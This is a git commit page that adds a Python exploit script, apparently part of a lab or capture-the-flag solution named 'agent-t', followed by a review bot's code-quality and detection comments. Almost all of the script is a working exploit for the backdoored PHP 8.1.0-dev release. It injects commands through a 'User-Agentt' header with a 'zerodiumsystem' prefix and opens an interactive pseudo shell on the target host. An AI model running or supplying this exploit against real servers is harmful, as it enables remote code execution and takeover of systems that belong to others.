authorRaghuram Subramani <raghus2247@gmail.com>2022-09-24 01:51:43 -0400
committerRaghuram Subramani <raghus2247@gmail.com>2022-09-24 01:51:43 -0400
commit14d0504e13c115f18d0397756dee998cd36436ee (patch)
tree39d672e494b0dbbd524b20ef8da8daad5feb6351 /agent-t/exploit.py
parentcf317c77c1a554cce31ee540e10e92a0b0893b7e (diff)
add agent-t
Diffstat (limited to 'agent-t/exploit.py')
-rw-r--r--agent-t/exploit.py53
1 files changed, 53 insertions, 0 deletions
diff --git a/agent-t/exploit.py b/agent-t/exploit.py
new file mode 100644
index 0000000..3bd6e9d
--- /dev/null
+++ b/agent-t/exploit.py
@@ -0,0 +1,53 @@
+# Exploit Title: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
+# Date: 23 may 2021
+# Exploit Author: flast101
+# Vendor Homepage: https://www.php.net/
+# Software Link:
+# - https://hub.docker.com/r/phpdaily/php
+# - https://github.com/phpdaily/php
+# Version: 8.1.0-dev
+# Tested on: Ubuntu 20.04
+# References:
+# - https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
+# - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md
+
+"""
+Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
+Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/backdoor_php_8.1.0-dev.py
+Contact: flast101.sec@gmail.com
+
+An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.
+The following exploit uses the backdoor to provide a pseudo shell ont the host.
+"""
+
+#!/usr/bin/env python3
+import os
+import re
+import requests
+
+host = input("Enter the full host url:\n")
+request = requests.Session()
+response = request.get(host)
+
+if str(response) == '<Response [200]>':
+ print("\nInteractive shell is opened on", host, "\nCan't acces tty; job crontol turned off.")
+ try:
+ while 1:
+ cmd = input("$ ")
+ headers = {
+ "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
+ "User-Agentt": "zerodiumsystem('" + cmd + "');"
+ }
+ response = request.get(host, headers = headers, allow_redirects = False)
+ current_page = response.text
+ stdout = current_page.split('<!DOCTYPE html>',1)
+ text = print(stdout[0])
+ except KeyboardInterrupt:
+ print("Exiting...")
+ exit()
+
+else:
+ print("\r")
+ print(response)
+ print("Host is not available, aborting...")
+ exit()
\ No newline at end of file
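Review bot: The `#!/usr/bin/env python3` line lands on line 23 of the new file, below the header comments and the docstring, so it is an ordinary comment and has no effect; move it to line 1 or drop it, since the file is added with mode 100644 anyway. `import os` and `import re` are never used, and `text = print(stdout[0])` binds `None` to a name that is never read. The status test compares the response object's repr; `if response.status_code == 200:` expresses the same check directly. For readers on the detection side, the header comment could also record the observable this script produces: every command is sent as a request header named `User-Agentt` whose value starts with `zerodium`, alongside a fixed Firefox 78 `User-Agent` string.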